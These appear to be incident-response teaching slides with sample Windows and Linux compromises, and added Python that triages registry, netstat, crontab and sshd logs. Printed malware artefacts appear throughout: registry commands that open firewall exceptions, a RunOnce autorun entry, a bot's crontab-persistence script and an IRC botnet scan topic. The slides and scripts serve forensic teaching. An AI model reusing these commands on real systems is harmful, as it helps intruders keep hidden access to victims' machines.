2012 Sample cases of network incidents
[email protected]

Description: a few examples of security incidents on the internet that were investigated.


Copyright Carnegie Mellon University


Give a man a stolen credit card and he will eat like a king for one day. Teach him how to phish, and he is provided for for life.

-- an ancient Nigerian proverb


Received: from [98.139.xxx.xxx] by web141006.mail.bf1.yahoo.com via HTTP; Wed, 11 Apr 2012 12:15:40 PDT
X-Mailer: YahooMailWebService/0.8.117.340979
References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]>
Message-ID: <[email protected]>
Date: Wed, 11 Apr 2012 12:15:40 -0700 (PDT)
From: Xxxx Xxxxx <[email protected]>
Reply-To: Xxxx Xxxxx <[email protected]>
Subject: =?utf-8?B?Rnc6IGZpbmFuxI1uYSBrYXJ0aWNhICggcmHEjXVub3ZvZHNrYSBzbHXFvmJh?=
 =?utf-8?B?KQ==?=
To: "[email protected]"
Cc: [email protected]
In-Reply-To: <[email protected]>


Operation: Process Create
Result: SUCCESS
Command line: "C:\Program Files\SumatraPDF\SumatraPDF.exe" "C:\Documents and Settings\tt\Application Data\navodila_pogodba_ePOBOT_AJPES.pdf"


cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\svchost.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\svchost.exe:*:Enabled:Windows Messanger" /f

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\Svchost32.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\Svchost32.exe:*:Enabled:Windows Messanger" /f

"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" + "IeXplorer32" "C:\Users\User\AppData\Roaming\Prometna_Kartica_Apr2012.exe"
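As an added example (not code from the slides), the Python below triages process-log command lines of the kind shown above. The three REG ADD commands are the ones on the slide; the RunOnce entry is rewritten as the REG ADD command that would produce it (a constructed form). The checks flag the firewall exception list being opened for a binary in a user-writable profile directory, a system-process look-alike name outside the Windows directory, the DoNotAllowExceptions flag being cleared, and Run/RunOnce entries pointing into the profile. The helper and constant names are this example's own.

```python
import re
from typing import List, Tuple

# Sample process-log command lines. The first three are the REG ADD commands the
# slide shows the dropper running; the fourth is the slide's RunOnce entry
# rewritten as the REG ADD command that would produce it (constructed form).
SAMPLE_EVENTS = [
    r'cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f',
    r'cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\svchost.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\svchost.exe:*:Enabled:Windows Messanger" /f',
    r'cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\Svchost32.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\Svchost32.exe:*:Enabled:Windows Messanger" /f',
    r'cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v "IeXplorer32" /t REG_SZ /d "C:\Users\User\AppData\Roaming\Prometna_Kartica_Apr2012.exe" /f',
]

# REG ADD <key> /v "<name>" [/t <type>] /d "<data>"; names and data are quoted in
# the sample, so each capture stops at the closing quote.
REG_ADD = re.compile(
    r'REG ADD\s+(?P<key>\S+)\s+/v\s+"(?P<name>[^"]+)"'
    r'(?:\s+/t\s+(?P<type>\w+))?\s+/d\s+"(?P<data>[^"]*)"',
    re.IGNORECASE,
)
# Per-user writable locations; legitimate services and firewall exceptions
# almost never point here.
USER_PROFILE_DIR = re.compile(r"\\(Application Data|AppData\\(Roaming|Local))\\", re.IGNORECASE)
# Names that imitate Windows system processes (svchost32.exe, lsass64.exe, ...).
LOOKALIKE = re.compile(r"^(svchost|lsass|csrss|winlogon|smss)\w*\.exe$", re.IGNORECASE)


def parse_reg_add(cmdline: str):
    """Return (key, value name, data) from a REG ADD command line, or None."""
    m = REG_ADD.search(cmdline)
    if not m:
        return None
    return m.group("key"), m.group("name"), m.group("data")


def _check_path(context: str, path: str) -> List[str]:
    out = []
    base = path.replace("/", "\\").rsplit("\\", 1)[-1]
    if USER_PROFILE_DIR.search(path):
        out.append(f"{context}: executable in user profile directory: {path}")
    if LOOKALIKE.match(base) and "\\windows\\" not in path.lower():
        out.append(f"{context}: '{base}' outside the Windows directory (masquerading)")
    return out


def triage(cmdline: str) -> List[str]:
    """Findings for one command line; an empty list means nothing noteworthy."""
    parsed = parse_reg_add(cmdline)
    if parsed is None:
        return []
    key, name, data = parsed
    key_l = key.lower()
    findings: List[str] = []
    if (key_l.endswith(r"\firewallpolicy\standardprofile")
            and name.lower() == "donotallowexceptions" and data == "0"):
        findings.append("firewall: exceptions re-enabled (DoNotAllowExceptions=0)")
    if key_l.endswith(r"\authorizedapplications\list"):
        # The value name is the full path of the program being allowed through.
        findings.extend(_check_path("firewall exception", name))
    if re.search(r"\\currentversion\\run(once)?$", key_l):
        findings.extend(_check_path(f"autorun '{name}'", data))
    return findings


def triage_all(events) -> List[Tuple[int, str]]:
    """(event index, finding) for every finding across a list of command lines."""
    return [(i, f) for i, e in enumerate(events) for f in triage(e)]


if __name__ == "__main__":
    for idx, finding in triage_all(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Run against the four sample events it produces six findings: one for the cleared DoNotAllowExceptions flag, two each for the svchost.exe and Svchost32.exe exceptions (profile directory plus look-alike name), and one for the RunOnce entry in AppData\Roaming.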


$ whois 178.172.xxx.xxx

inetnum:        178.172.xxx.0 - 178.172.xxx.255
netname:        ARNES-NET
descr:          Academic and Research Network of Slovenia
descr:          Ljubljana
descr:          Slovenia


# netstat -anpt | more
...
178.172.xxx.xxx:44947   178.17.86.40:22      SYN_SENT    -
178.172.xxx.xxx:40448   178.17.86.42:22      SYN_SENT    -
178.172.xxx.xxx:47351   178.17.86.35:22      SYN_SENT    -
178.172.xxx.xxx:57112   178.17.85.142:22     SYN_SENT    -
178.172.xxx.xxx:44947   178.17.86.48:22      SYN_SENT    -
178.172.xxx.xxx:40448   178.17.86.242:22     SYN_SENT    -
178.172.xxx.xxx:47351   178.17.86.135:22     SYN_SENT    -
178.172.xxx.xxx:57112   178.17.85.12:22      SYN_SENT    -
178.172.xxx.xxx:44947   178.17.86.50:22      SYN_SENT    -
178.172.xxx.xxx:40448   178.17.86.92:22      SYN_SENT    -
178.172.xxx.xxx:47351   178.17.86.25:22      SYN_SENT    -
178.172.xxx.xxx:57112   178.17.85.122:22     SYN_SENT    -
...


# netstat -anpt | more
...
178.172.xxx.xxx:48174   208.83.20.130:6667    ESTABLISHED 5472/-bash
178.172.xxx.xxx:57221   194.109.20.90:6667    ESTABLISHED 5472/-bash
178.172.xxx.xxx:34110   195.197.175.21:7000   ESTABLISHED 5472/-bash
...

$ dig -x 208.83.20.130

130.20.83.208.in-addr.arpa.  195   IN PTR Tampa.FL.US.Undernet.org.
90.20.109.194.in-addr.arpa.  86400 IN PTR undernet.xs4all.nl.
21.175.197.195.in-addr.arpa. 14400 IN PTR irc2.saunalahti.fi.
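The two netstat listings above show the two patterns an analyst looks for on a compromised host: a fan-out of half-open SYN_SENT connections to one port across many hosts (the box scanning others), and a shell process holding established sessions to IRC ports (the bot's control channel). As an added example, not code from the slides, the Python below parses constructed `netstat -anpt` output modelled on both slides (local address 192.0.2.10 stands in for the masked host; the destinations, ports, states and the `5472/-bash` column are the slide's) and reports both patterns. The threshold and the IRC port set are this example's assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed 'netstat -anpt' output modelled on the two slides. Local address
# 192.0.2.10 replaces the masked host; the listening sshd and the curl session
# are benign rows added so the filters have something to ignore.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1021/sshd
tcp        0      0 192.0.2.10:55020        198.51.100.7:443        ESTABLISHED 3310/curl
tcp        0      1 192.0.2.10:44947        178.17.86.40:22         SYN_SENT    -
tcp        0      1 192.0.2.10:40448        178.17.86.42:22         SYN_SENT    -
tcp        0      1 192.0.2.10:47351        178.17.86.35:22         SYN_SENT    -
tcp        0      1 192.0.2.10:57112        178.17.85.142:22        SYN_SENT    -
tcp        0      1 192.0.2.10:44947        178.17.86.48:22         SYN_SENT    -
tcp        0      1 192.0.2.10:40448        178.17.86.242:22        SYN_SENT    -
tcp        0      1 192.0.2.10:47351        178.17.86.135:22        SYN_SENT    -
tcp        0      1 192.0.2.10:57112        178.17.85.12:22         SYN_SENT    -
tcp        0      1 192.0.2.10:44947        178.17.86.50:22         SYN_SENT    -
tcp        0      1 192.0.2.10:40448        178.17.86.92:22         SYN_SENT    -
tcp        0      1 192.0.2.10:47351        178.17.86.25:22         SYN_SENT    -
tcp        0      1 192.0.2.10:57112        178.17.85.122:22        SYN_SENT    -
tcp        0      0 192.0.2.10:48174        208.83.20.130:6667      ESTABLISHED 5472/-bash
tcp        0      0 192.0.2.10:57221        194.109.20.90:6667      ESTABLISHED 5472/-bash
tcp        0      0 192.0.2.10:34110        195.197.175.21:7000     ESTABLISHED 5472/-bash
"""

# One TCP row: proto, queues, local addr:port, foreign addr:port, state, PID/prog.
# A listening socket has '*' as the foreign port.
ROW = re.compile(
    r"^(?P<proto>tcp6?)\s+\d+\s+\d+\s+"
    r"(?P<laddr>\S+):(?P<lport>\d+|\*)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+|\*)\s+"
    r"(?P<state>[A-Z_]+)\s+(?P<prog>\S+)"
)
IRC_PORTS = {6667, 6668, 6669, 7000}   # assumed set of common IRC ports
SCAN_THRESHOLD = 8                     # distinct hosts on one port from one source


def parse_netstat(text: str) -> List[dict]:
    """Rows as dicts; banner and header lines do not match and are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["rport"] = int(d["rport"]) if d["rport"].isdigit() else None
        rows.append(d)
    return rows


def find_scanners(rows, threshold: int = SCAN_THRESHOLD) -> Dict[Tuple[str, int], int]:
    """(local address, remote port) -> number of distinct remote hosts in
    SYN_SENT. Many hosts on one port from one source is outbound scanning."""
    hosts = defaultdict(set)
    for r in rows:
        if r["state"] == "SYN_SENT" and r["rport"] is not None:
            hosts[(r["laddr"], r["rport"])].add(r["raddr"])
    return {k: len(v) for k, v in hosts.items() if len(v) >= threshold}


def find_irc_sessions(rows) -> List[Tuple[str, str, int]]:
    """(PID/program, remote host, port) for established sessions to IRC ports;
    the program column tells you which process to hand to lsof next."""
    return [(r["prog"], r["raddr"], r["rport"]) for r in rows
            if r["state"] == "ESTABLISHED" and r["rport"] in IRC_PORTS]


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("scanners:", find_scanners(rows))
    print("irc sessions:", find_irc_sessions(rows))
```

On the sample this reports one scanner, `('192.0.2.10', 22)` with 12 distinct targets, and three IRC sessions all owned by `5472/-bash`, which is the PID the next slide feeds to `lsof -np`.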


# lsof -np 5472
...
-bash   5472 root  txt  REG  8,1  35352  /var/spool/samba/.bash/-bash
...


# file /var/spool/samba/.bash/*
./autorun:     POSIX shell script text executable
./-bash:       ELF 32-bit LSB executable, Intel 80386, version
./cron.d:      ASCII text
./cyc.acc:     ASCII text
./cyc.hold:    a /usr/bin/perl script text executable
./cyc.pid:     ASCII text
./cyc.session: ASCII text
./cyc.set:     ASCII English text
./go:          ASCII text
./mech.dir:    ASCII text
./m.help:      data
./pico:        ELF 32-bit LSB executable, Intel 80386, version 1
./run:         POSIX shell script text executable
./stealth:     ELF 32-bit LSB executable, Intel 80386, version 1
./update:      POSIX shell script text executable


$ cat /var/spool/samba/.bash/autorun
#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d && perl cyc.hold
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/cyc.pid; then
pid=\$(cat $dir/cyc.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1); then
exit 0
fi
fi
cd $dir
rm -rf cyc.hold
./run &>/dev/null" > update
chmod u+x update
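The autorun script above installs a one-line crontab entry that re-launches the bot every minute from a hidden directory under /var/spool and discards all output. As an added example (not code from the slides), the Python below parses `crontab -l` output and scores each job on exactly those traits, so the same entry stands out among ordinary jobs. The crontab text is constructed: its first line is the entry the script above writes (with `$dir` expanded to the slide's /var/spool/samba/.bash), the other two are benign jobs added for contrast; the directory list and scoring rules are this example's assumptions.

```python
import re
from typing import List, Tuple

# Constructed 'crontab -l' output: the first job is the one the autorun script
# installs (its $dir was /var/spool/samba/.bash on the slide); the other two
# are ordinary jobs added for contrast.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
* * * * * /var/spool/samba/.bash/update >/dev/null 2>&1
0 3 * * * /usr/bin/certbot renew --quiet
@daily /usr/local/bin/backup.sh >/dev/null 2>&1
"""

# Either an @-shortcut or five schedule fields, then the command.
SCHEDULE = re.compile(r"^(?P<sched>@\w+|(?:\S+\s+){4}\S+)\s+(?P<cmd>.+)$")
# Directories a legitimate cron command rarely lives in; each is writable by
# some unprivileged account or service (assumed list).
SUSPICIOUS_DIRS = ("/var/spool/", "/tmp/", "/var/tmp/", "/dev/shm/")


def parse_crontab(text: str) -> List[Tuple[str, str]]:
    """(schedule, command) for each job; comments, blank lines and VAR=value
    assignments are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = SCHEDULE.match(line)
        if m:
            jobs.append((m.group("sched").strip(), m.group("cmd")))
    return jobs


def score_job(schedule: str, cmd: str) -> List[str]:
    """Reasons a job looks like a persistence/watchdog entry; empty if none."""
    reasons = []
    if schedule == "* * * * *":
        reasons.append("runs every minute (restart loop)")
    for token in cmd.split():
        if re.search(r"/\.[^/.]", token):
            reasons.append(f"hidden directory in path: {token}")
        if token.startswith(SUSPICIOUS_DIRS):
            reasons.append(f"command in spool/temp directory: {token}")
    if re.search(r">\s*/dev/null", cmd):
        reasons.append("output discarded (>/dev/null)")
    return reasons


def suspicious_jobs(text: str, min_reasons: int = 2) -> List[Tuple[str, str, List[str]]]:
    """Jobs with at least min_reasons findings; a lone '>/dev/null' on a
    normal backup job is not enough to report."""
    out = []
    for sched, cmd in parse_crontab(text):
        reasons = score_job(sched, cmd)
        if len(reasons) >= min_reasons:
            out.append((sched, cmd, reasons))
    return out


if __name__ == "__main__":
    for sched, cmd, reasons in suspicious_jobs(SAMPLE_CRONTAB):
        print(f"{sched} {cmd}")
        for r in reasons:
            print("   -", r)
```

Only the bot's entry is reported, with four reasons; the certbot job scores nothing and the backup job's single `>/dev/null` stays below the threshold. The same scoring applies to /etc/cron.d and the per-user spool files once their contents are read.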


$ grep Accepted secure
May 4 11:29:09 spxxxxx sshd[22429]: Accepted password for bxxx from 193.2.xxx.xxx port 60429 ssh2
May 4 11:29:52 spxxxxx sshd[22453]: Accepted password for bxxx from 193.2.xxx.xxx port 60438 ssh2
May 4 11:56:45 spxxxxx sshd[22697]: Accepted password for root from 209.172.51.39 port 48792 ssh2
May 4 16:05:46 spxxxxx sshd[23079]: Accepted password for root from 79.118.61.94 port 1079 ssh2
May 4 18:05:39 spxxxxx sshd[17116]: Accepted password for root from 14.63.213.191 port 48309 ssh2
May 5 10:42:35 spxxxxx sshd[22874]: Accepted password for root from 202.199.160.210 port 40019 ssh2
May 5 11:52:38 spxxxxx sshd[23117]: Accepted password for root from 86.124.223.6 port 2058 ssh2
May 5 11:56:29 spxxxxx sshd[23184]: Accepted password for root from 86.124.223.6 port 2061 ssh2
May 5 11:57:18 spxxxxx sshd[23197]: Accepted password for root from 86.124.223.6 port 2062 ssh2
May 5 11:57:28 spxxxxx sshd[23204]: Accepted password for root from 86.124.223.6 port 2063 ssh2
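The log excerpt above is the whole story in ten lines: a local user logs in twice from the site's own range, and 27 minutes later root starts logging in with a password from addresses all over the world. As an added example (not code from the slides), the Python below turns such `Accepted` lines into the three numbers an analyst wants first: how many root password logins there were, how many distinct external sources each user came from, and how long after the last trusted login the first external root login occurred. The log lines are constructed on the slide's pattern (192.0.2.5 replaces the masked internal address; hostname, user names and remote addresses are as on the slide); the trusted range and the syslog year are this example's assumptions.

```python
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List

# Constructed /var/log/secure lines modelled on the slide; 192.0.2.5 stands in
# for the masked internal address.
SAMPLE_SECURE = """\
May  4 11:29:09 spxxxxx sshd[22429]: Accepted password for bxxx from 192.0.2.5 port 60429 ssh2
May  4 11:29:52 spxxxxx sshd[22453]: Accepted password for bxxx from 192.0.2.5 port 60438 ssh2
May  4 11:56:45 spxxxxx sshd[22697]: Accepted password for root from 209.172.51.39 port 48792 ssh2
May  4 16:05:46 spxxxxx sshd[23079]: Accepted password for root from 79.118.61.94 port 1079 ssh2
May  4 18:05:39 spxxxxx sshd[17116]: Accepted password for root from 14.63.213.191 port 48309 ssh2
May  5 10:42:35 spxxxxx sshd[22874]: Accepted password for root from 202.199.160.210 port 40019 ssh2
May  5 11:52:38 spxxxxx sshd[23117]: Accepted password for root from 86.124.223.6 port 2058 ssh2
May  5 11:56:29 spxxxxx sshd[23184]: Accepted password for root from 86.124.223.6 port 2061 ssh2
May  5 11:57:18 spxxxxx sshd[23197]: Accepted password for root from 86.124.223.6 port 2062 ssh2
May  5 11:57:28 spxxxxx sshd[23204]: Accepted password for root from 86.124.223.6 port 2063 ssh2
"""

# Syslog timestamp (single or double space before the day), host, sshd[pid],
# then the 'Accepted <method> for <user> from <ip> port <n>' message.
ACCEPTED = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)
# Assumed trusted range (constructed); everything else counts as external.
TRUSTED = [ipaddress.ip_network("192.0.2.0/24")]


@dataclass
class Login:
    when: datetime
    method: str
    user: str
    ip: str


def parse_secure(text: str, year: int = 2012) -> List[Login]:
    """Syslog lines carry no year, so the caller supplies it."""
    out = []
    for line in text.splitlines():
        m = ACCEPTED.match(line)
        if not m:
            continue
        when = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}",
                                 "%Y %b %d %H:%M:%S")
        out.append(Login(when, m["method"], m["user"], m["ip"]))
    return out


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in TRUSTED)


def summarize(logins: List[Login]) -> Dict[str, object]:
    """Root password logins (should be zero when PermitRootLogin is off or
    key-only), distinct external sources per user, and the gap between the
    last trusted login and the first external root login."""
    root_pw = [l for l in logins if l.user == "root" and l.method == "password"]
    sources: Dict[str, set] = defaultdict(set)
    for l in logins:
        if is_external(l.ip):
            sources[l.user].add(l.ip)
    trusted = [l.when for l in logins if not is_external(l.ip)]
    ext_root = [l.when for l in root_pw if is_external(l.ip)]
    gap = (min(ext_root) - max(trusted)).total_seconds() if trusted and ext_root else None
    return {
        "root_password_logins": len(root_pw),
        "external_sources": {u: len(s) for u, s in sources.items()},
        "first_external_root": min(ext_root).isoformat(sep=" ") if ext_root else None,
        "seconds_from_last_trusted_to_root": gap,
    }


if __name__ == "__main__":
    for k, v in summarize(parse_secure(SAMPLE_SECURE)).items():
        print(f"{k}: {v}")
```

For the sample this gives 8 root password logins from 5 distinct external addresses, the first at 2012-05-04 11:56:45, 1613 seconds after the last login from the trusted range; the user bxxx never appears as an external source, which is what you would expect if the credential was taken from the workstation rather than guessed remotely.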


Now talking on #xhack
* Topic for #xhack is: ./a 178.17;./a 201.251;./a 195.76;./a 195.248;./a 81.211 129.25 128.32 144.30 134.50
* Topic for #xhack set by BaRoZ at Sun May 01 16:21:28 2011
...
<BaRoZ> nuf1f_ say a
<BaRoZ> nuf1f_ say a
<BaRoZ> +kb nuf1f_
* start__ sets ban on *!*[email protected].*.*
> >
* You have been kicked from #xhack by start__ (Requested Kick)


* /who #xhack
* #xhack ~Fly 178.172.xxx.xxx *.undernet.org sasesase H :3 Powerd by move
* #xhack ~Fly 124.82.70.197 *.undernet.org informati H@ :3 Powerd by move
* #xhack ~Fly 121.241.77.194 *.undernet.org luccc H@ :3 Powerd by move
* #xhack ~Fly biophys3.physics.usyd.edu.au *.undernet.org biophys3 H@ :3 Powerd by move
* #xhack ~chattr 218.189.204.215 *.undernet.org DHL H@ :3 chattr
* #xhack ~Fly 93-44-208-192.ip98.fastwebnet.it *.undernet.org valy____ H@ :3 Powerd by move
* #xhack ~lolipop 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org part_ H@ :3 lolipop
* #xhack ~lolipop Edd.users.undernet.org *.undernet.org valyca H@x :3 lolipop
* #xhack ~luzar MService.users.undernet.org *.undernet.org VaLi H@x :3 luser
* #xhack ~alpha 62.94.13.227 *.undernet.org vali__ H@ :3 omega
* #xhack ~circ 82.193.22.182 *.undernet.org start__ H@ :3 circ
* #xhack ~chattr 82.193.22.182 *.undernet.org start___ H@ :3 chattr
* #xhack ~circ 122.99.166.142 *.undernet.org removed__ H@ :3 circ
* #xhack ~Fly 80.82.17.151 *.undernet.org xHaCk H@ :3 Powerd by move
* #xhack ~lolipop a83-161-134-137.adsl.xs4all.nl *.undernet.org valyca__ H@ :3 lolipop
* #xhack ~circ a83-161-134-137.adsl.xs4all.nl *.undernet.org removed H@ :3 circ
* #xhack ~chattr a83-161-134-137.adsl.xs4all.nl *.undernet.org moved H@ :3 chattr
* #xhack ~circ 62.94.13.227 *.undernet.org VaLi_ H@ :3 circ
* #xhack ~lolipop 82.193.22.182 *.undernet.org start_ H@ :3 lolipop
* #xhack ~lolipop 190.114.224.11 *.undernet.org valyca_ H@ :3 lolipop
* #xhack ~chattr 122.99.166.142 *.undernet.org VaLy___ H@ :3 chattr
* #xhack ~circ 190.114.224.11 *.undernet.org removed_ H@ :3 circ
* #xhack ~VaLy hax0r.users.undernet.org *.undernet.org BaRoZ H@x :3 VaLy
* #xhack ~Aly 50.16.26.202 *.undernet.org gzip H@ :3 Powerd by move
* #xhack ~chattr 190.114.224.11 *.undernet.org moved_ H@ :3 chattr
* #xhack ~UK mail.pjsind.co.uk *.undernet.org part____ H@ :3 Powerd by move
* #xhack ~circ Ezl.users.undernet.org *.undernet.org valentin H@x :3 circ
* #xhack ~bursuc sd-23267.dedibox.fr *.undernet.org VaLy_ H@ :3 Powerd by move
* #xhack ~lolipop 122.99.166.142 *.undernet.org valyca___ H@ :3 lolipop
* #xhack ~Fly 88.191.129.21 *.undernet.org Valeriu H@ :3 Powerd by move
* #xhack ~Fly 46.28.110.179 *.undernet.org pizdel H@ :3 Powerd by move
* #xhack ~Kitty xray426.server4you.de *.undernet.org move H@ :3 Powerd by move
* #xhack ~Fly v-182-163-56-103.ub-freebit.net *.undernet.org valy_____ H@ :3 Powerd by move
* #xhack ~chattr 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org cUc H@ :3 chattr
* #xhack :End of /WHO list.


# find / -ctime -10 -print
# find / -mtime -5 -ls
# find / -amin -120 -print
# stat somefile
# cat .bash_history
# ls -la
# ls -lct
# ls -l /proc/PID/

# ps -ef
# lsof -np PID
# lsof -ni TCP:22
# pstree -aAp
# last -i
# file somefile.bin
# strings somefile.bin
# chkrootkit
# rkhunter
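The first half of the checklist above is a file-system timeline: which files changed in the last N days (`find -ctime`, `-mtime`, `-amin`), sorted by change time (`ls -lct`), with `stat` for the individual timestamps. As an added example (not code from the slides), the Python below does the same walk and adds the one check the shell one-liners do not make directly: a file whose ctime is much later than its mtime, which is what a backdated mtime (utime, `touch -t`) or a later chmod/chown leaves behind, since ctime cannot be set from user space. The demo tree it builds is constructed (two throw-away files in a temporary directory); function names and the tolerance are this example's own.

```python
import os
import tempfile
import time
from dataclasses import dataclass
from typing import Iterator, List, Tuple


@dataclass
class Entry:
    path: str
    mtime: float  # content last written
    ctime: float  # inode last changed: any write, chmod, chown, link/unlink
    atime: float
    size: int


def walk_stat(root: str) -> Iterator[Entry]:
    """Stat every regular file below root without following symlinks, the
    same tree 'find / -ctime -10' visits."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the walk
            yield Entry(p, st.st_mtime, st.st_ctime, st.st_atime, st.st_size)


def recent(root: str, days: float = 10, field: str = "ctime",
           now: float = None) -> List[Entry]:
    """Files whose chosen timestamp falls within the last N days, newest
    first (the 'find -ctime -N' / 'ls -lct' step of the checklist)."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    hits = [e for e in walk_stat(root) if getattr(e, field) >= cutoff]
    hits.sort(key=lambda e: getattr(e, field), reverse=True)
    return hits


def backdated(root: str, tolerance: float = 60.0) -> List[Entry]:
    """Files whose ctime is later than their mtime by more than tolerance
    seconds. mtime can be rewritten at will; ctime moves on every inode
    change and cannot be set back, so a large gap marks a file whose mtime
    was backdated or whose mode/owner changed after its last content write."""
    return [e for e in walk_stat(root) if e.ctime - e.mtime > tolerance]


def make_demo_tree() -> Tuple[str, str, str]:
    """Constructed tree: one file with its mtime pushed 40 days back, one
    file left fresh. Returns (root, backdated path, fresh path)."""
    root = tempfile.mkdtemp(prefix="ir-timeline-")
    old = os.path.join(root, "libc.so.6.bak")
    fresh = os.path.join(root, "update")
    for p in (old, fresh):
        with open(p, "w") as fh:
            fh.write("x")
    past = time.time() - 40 * 86400
    os.utime(old, (past, past))  # rewrites atime/mtime; ctime stays at 'now'
    return root, old, fresh


if __name__ == "__main__":
    root, old, fresh = make_demo_tree()
    print("modified in last 10 days:", [e.path for e in recent(root, 10, "mtime")])
    print("changed in last 10 days:", [e.path for e in recent(root, 10, "ctime")])
    print("ctime/mtime mismatch:", [e.path for e in backdated(root)])
```

On the demo tree the mtime view hides the backdated file, exactly as `ls -l` would, while the ctime view and the mismatch check both surface it; on a real system run it against the directories the incident points to (here /var/spool) rather than the whole root first.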
